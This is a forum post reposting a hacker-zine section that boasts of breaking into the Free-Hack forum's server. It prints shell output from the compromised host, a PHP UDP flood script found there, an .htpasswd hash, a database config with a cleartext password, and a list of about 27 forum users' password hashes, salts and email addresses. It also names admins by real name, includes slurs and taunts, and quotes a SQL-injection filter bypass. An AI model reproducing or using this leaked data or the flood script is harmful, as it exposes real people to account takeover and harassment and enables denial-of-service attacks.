Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 Part 6 : hack got hacked.. happy reading anyone!!

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2626
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: Part 6 : hack got hacked.. happy reading anyone!!   Thu Jan 27, 2011 3:29 pm

=========================
! ~ free-hack ~
=========================


Many people will wonder why we owned Free-Hack because they always
claimed to have nothing to do with fraud and stuff. In fact this is
the second time we owned them but the first time we go public. The
first time was a few months ago in order to check out what they were
doing in their internal eleet priv8 sections. To our surprise they
really had nothing to do with fraud. Still, they are part of the
problem we call the skiddy breeding of lameness.

Actually, there are a few communities where you can find a few skilled
members. Free-Hack is a forum where you can find two or three. The
rest are simple skidi0ts who have no right to even exist, let alone be
on our internet. Also the admins, particularly "Suicide" aka Mr.
Stefan Finke or "enco" aka Mr. Enrico Costanzo are nothing but
arrogant asshats who's only apparent talent appears to be banning
people. Oh wait, "Suicide" actually HAS skill. Like he mastered the
usage of Hydra and is now able to hax every Teamspeak server. Ph33r.
Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
guy, who had the right spirit and was willing to learn. But getting
promoted to admin in a "hacker" community with ~40k users which has an
"expert" zone for "skilled" members who talk about how to bypass the
Webspell SQL Injection filter is the worst thing he could have done...



Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
Too ninja again.

|$ uname -a
Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux

|$ id
uid=508(freehack) gid=504(freehack) groups=504(freehack)

|$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
freehack:x:508:504::/home/freehack:/usr/local/cpanel/bin/jailshell
ntp:x:38:38::/etc/ntp:/sbin/nologin
lsadm:x:101:32009::/:/sbin/nologin


|$ ls -la /
total 108
drwxr-xr-x 24 root root 4096 Nov 30 02:12 .
drwxr-xr-x 24 root root 4096 Nov 30 02:12 ..
-rw-r--r-- 1 root root 0 Nov 30 02:12 .autofsck
-rw-r--r-- 1 root root 0 Jan 17 2009 .autorelabel
drwx------ 2 root 500 4096 Nov 11 18:43 .spamassassin
lrwxrwxrwx 1 root root 39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
drwx--x--x 3 root root 4096 Nov 13 09:00 backup
drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin
drwxr-xr-x 2 root root 4096 Jan 26 2010 boot
drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev
drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc
drwx--x--x 8 root root 4096 Nov 14 07:11 home
drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib
drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64
drwxr-xr-x 2 root root 4096 Jan 26 2010 media
drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt
drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt
dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc
drwxr-x--- 14 root root 4096 Dec 8 21:36 root
drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin
drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts
drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux
drwxr-xr-x 2 root root 4096 Jan 26 2010 srv
drwxr-xr-x 3 root root 0 Nov 30 02:12 sys
drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp
drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr
drwxr-xr-x 22 root root 4096 Nov 11 18:01 var

|$ ls -la /home/freehack/public_html
total 3100
drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 .
drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 ..
-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess
drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd
-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log
drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt
-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php
-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php
-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php
-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php
-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php
-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php
-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php
-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php
-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php
-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php
-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php
-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php
-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php
-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php
-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache
-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive
-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php
-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php
-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php
-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php
-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php
-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php
-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php
-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png
-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php
drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder
drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog
-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php
-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php
-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin
-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif
drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples
-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php
drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm
drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles
-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php
-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php
-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php
-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars
drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics
-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php
-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php
-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php
-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php
-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php
-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico
-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php
-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php
-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php
-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php
-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php
-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html
-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php
-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php
-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php
-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess
-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php
drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images
drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img
drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes
-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php
-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php
-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php
-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php
-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp
-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php
-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php
-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php
-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php
-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php
-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php
-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php
-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php
-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php
-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php
drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste
-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png
-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php
-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php
-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php
-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php
-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php
-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php
-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php
-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php
-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php
-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php
-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php
-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php
-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php
-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php
-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php
-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php
-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php
-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php
-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php
-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php
-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php
-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php
-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php
drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics
drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap
-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php
-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php
-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php
-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php
-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php
drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp
-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php
-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php
drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise
drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo
-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php
drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap
-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php
-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php
-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php
-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php


RETARDED PHP CODE ALERT!

|$ cat x.php
|if(!|$_GET['target'])
{
die('no target ip specified!');
}
|$target = |$_GET['t'];

|$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!|$sock) die(__LINE__);

|$data='';
for(|$i=0;|$i<1400;|$i++)
{
|$data.=chr(rand(0,255));
}

while(true)
{
if(!socket_sendto(|$sock,|$data,strlen(|$data),0,|$target,9)) die(__LINE__);
echo('.');
}

|?>



|$ cd 2tgh9322132k322l1sd

|$ ls
total 252
drwxr-xr-x 11 508 504 4096 Nov 14 09:24 .
drwxr-x--- 34 508 99 4096 Dec 4 22:13 ..
-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess
-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe
-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php
-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css
-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php
-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log
-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php
-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc
-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php
-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php
drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js
drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language
-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php
-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php
-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php
drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron
-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php
-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php
-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php
drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl
drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work

|$ cat .htpasswd
Suicide:|$1|$GTs9Hns/|$lPMGV.EaLgyqwNxgTQSwf1

|$ cat config.php
||// MySQL Dumper Configuration

// Host-Adress, default 'localhost'
|$config['dbhost'] = 'localhost';
// port - if empty, mysql uses default
|$config['dbport'] = '';
// socket - if empty, mysql uses default
|$config['dbsocket'] = '';

// Username
|$config['dbuser'] = 'freehack';
//User-Pass. For no Password leave empty
|$config['dbpass'] = '7qm#2nwAc|$oU';

//Speed Values between 50 and 1000000
//use low values if you have bad connection or slow machines
|$config['minspeed']=100;
|$config['maxspeed']=50000;

// Interface language and style
|$config['language']='en';
|$config['theme']='msd';

//Shows the Serveradress if 1
|$config['interface_server_caption']=1;
|$config['interface_server_captioncolor']='#ff9966';
//Position of the Serveradress 0=left, 1=right
|$config['interface_server_caption_position']=0;

//Height of the SQL-Box in Mini-SQL in pixel
|$config['interface_sqlboxsize']=70;
|$config['interface_table_compact']=0;

// Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
|$config['memory_limit']=100000;

// For gz-Compression set to 1, without compression set to 0
|$config['compression']=1;

//Refreshtime for MySQL processlist in msec, use any value >1000
|$config['processlist_refresh']=3000;

|$config['empty_db_before_restore']=0;
|$config['optimize_tables_beforedump']=1;
|$config['stop_with_error']=1;

// For sending a mail after backup set send_mail to 1, otherless set to 0
|$config['send_mail']=0;
// Attach the backup 0=no 1=yes
|$config['send_mail_dump']=0;
// set the recieve adress for the mail
|$config['email_recipient']='';
|$config['email_recipient_cc']='';
// set the sender adress (the script)
|$config['email_sender']='';

//max. Size of Email-Attach, here 3 MB
|$config['email_maxsize1']=3;
|$config['email_maxsize2']=2;

// FTP Server Configuration for Transfer
|$config['ftp_transfer'][0]=0;
|$config['ftp_timeout'][0]=30;
|$config['ftp_useSSL'][0]=0;
|$config['ftp_mode'][0]=0;
|$config['ftp_server'][0]=''; // Adress of FTP-Server
|$config['ftp_port'][0]='21'; // Port
|$config['ftp_user'][0]=''; // Username
|$config['ftp_pass'][0]=''; // Password
|$config['ftp_dir'][0]=''; // Upload-Directory

|$config['ftp_transfer'][1]=0;
|$config['ftp_timeout'][1]=30;
|$config['ftp_useSSL'][1]=0;
|$config['ftp_mode'][1]=0;
|$config['ftp_server'][1]='';
|$config['ftp_port'][1]='21';
|$config['ftp_user'][1]='';
|$config['ftp_pass'][1]='';
|$config['ftp_dir'][1]='';

|$config['ftp_transfer'][2]=0;
|$config['ftp_timeout'][2]=30;
|$config['ftp_useSSL'][2]=0;
|$config['ftp_mode'][2]=0;
|$config['ftp_server'][2]='';
|$config['ftp_port'][2]='21';
|$config['ftp_user'][2]='';
|$config['ftp_pass'][2]='';
|$config['ftp_dir'][2]='';

//Multipart 0=off 1=on
|$config['multi_part']=0;
|$config['multipartgroesse1']=1;
|$config['multipartgroesse2']=2;
|$config['multipart_groesse']=0;

//Auto-Delete 0=off 1=on
|$config['auto_delete']=0;
|$config['max_backup_files']=3;

//configuration file
|$config['cron_configurationfile']='mysqldumper.conf.php';
//path to perl, for windows use e.g. C:perlbinperl.exe
|$config['cron_perlpath']='/usr/bin/perl';
//mailer use sendmail(1) or SMTP(0)
|$config['cron_use_sendmail']=1;
//path to sendmail
|$sendmail_path=ini_get('sendmail_path');
|$config['cron_sendmail']=|$sendmail_path>'' ? |$sendmail_path: '/usr/lib/sendmail -t -oi -oem';

//adress of smtp-server
|$config['cron_smtp']='localhost';
//smtp-port
|$config['cron_smtp_port']=25;
|$config['cron_extender']=0;
|$config['cron_compression']=1;
|$config['cron_printout']=1;
|$config['cron_completelog']=1;
|$config['cron_comment']='';
|$config['multi_dump']=0;
|$config['logcompression']=1;
|$config['log_maxsize1']=1;
|$config['log_maxsize2']=2;
|$config['log_maxsize']=1048576;


________________________
| |
| FREE-HACK LIST OF LAME |
|________________________|



AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de
fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com
N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com
100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de
Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com
noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de
Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru
sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de
Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com
Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de
inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de
H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de
meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net
J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com
#b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de
enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru
Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com
Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com
PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de
GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}|$/:gray_foxde@yahoo.de
GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com
Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com
DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q|$:dvd_rom123@hotmail.com
Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru
novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net
ea|$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net
krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com

We think that novaca!ne's magic_quotes bypass is quite representative
for this group:

--snip snip--

Bypass magic_quotes (novaca!ne)
magic_quotes is a php setting (php.ini).
It causes that every ' (single-quote), " (double quote) and \ (backslash)
are escaped with a backslash automatically, a weak but wellknown securing method.
This is how to bypass it:
Use the funktion called ?String.fromCharCode()?, you need to translate your MySQL command
into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling.
? OR ?a? = ?a equals
String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)

--snip snip--

novaca!ne is (next to fred777) of course, our new security superhero!
Congratz, faggot...

Finally we shouldn't forget our old fag superhero fred777, who helped
us to understand how we could get every source code of a page. This
sounds pretty hard, but fred777 shows his priv8 techniques (we fear
them):

--snip snip--
#########################################################
# Sourcecode disclosure by social engineering
# tested on NPD
#########################################################

Intro:
Ich schildere hier mal einen Fall, welchen ich letztens
noch vor mir hatte. Ich war durch Zufall mal wieder auf den
vielen NPD Seiten, um nach Lücken zu suchen.
Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte
es den Anschein, als ob sich da eine SQL Injection befände.

Sobald nämlich der Limitparameter falsch übergeben wurde, kam der
übliche SQL Error:


What we learned is:
- If we write an email to an admin we always get the source code
- fred777 uses tools to exploit some sql injection

"o_O", one of the banned users puts it nicely: "being lame is one of
fred777's master skills" Just to inform you: We owned Free-Hack with
this technique of course.


Right, who deserves it? Correct! Suicide and enco for being badass
super high skilled computer professionals ... NOT

This is a warning Free-Hack. Continue existing and we will show no
mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.


That's all for now. We hope that those we have owned understood the
warning and that those who already enjoyed issue one were satisfied
with this release. We will take a little break for now and go to
Hawaii to get our asses drunk. But do not fear. There will always be
enough time for us to audit more code, write more 0day and own more
idiots. We will always watch the scene and act if we are needed. There
is sill a lot to do and the winter of hax is not over yet. So do
expect us.
Back to top Go down
View user profile http://malaysia.1talk.net
 
Part 6 : hack got hacked.. happy reading anyone!!
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: Berita Tentang Internet-
Jump to: